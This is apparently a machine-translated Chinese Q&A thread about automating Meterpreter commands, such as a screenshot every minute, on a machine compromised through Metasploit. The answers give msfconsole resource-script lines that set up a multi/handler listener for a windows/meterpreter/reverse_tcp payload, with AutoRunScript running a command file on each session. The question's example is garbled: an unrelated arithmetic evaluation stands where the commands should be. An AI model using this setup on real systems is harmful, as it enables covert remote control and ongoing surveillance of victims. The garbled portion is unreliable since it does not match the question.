自动运行metasploit然后是meterpreter命令

时间:2017-07-30 12:51:53

标签: python bash payload metasploit

我想每分钟自动运行metrpreter命令,遗憾的是我没有足够的编程技巧来制作bash脚本或python。 例如,我想自动执行这些操作:

x = 1%9*4/5+8*3/9%2-9
== 1*4/5+24/9%2-9
== 4/5+2%2-9
== 0+0-9
== -9

实际上每分钟自动截屏

2 个答案:

答案 0 :(得分:1)

执行类似

的操作
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST x.x.x.x
set LPORT 443
set AutoRunScript multi_console_command -rc commands.rc
exploit -j -z

在commands.rc中,每行放一个meterpreter命令

答案 1 :(得分:0)

我们可以制作listener.rc

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST x.x.x.x
set LPORT 443
exploit -j -z

并运行:

  

msfconsole -r~ / listener.rc

但是如何添加meterpreter命令?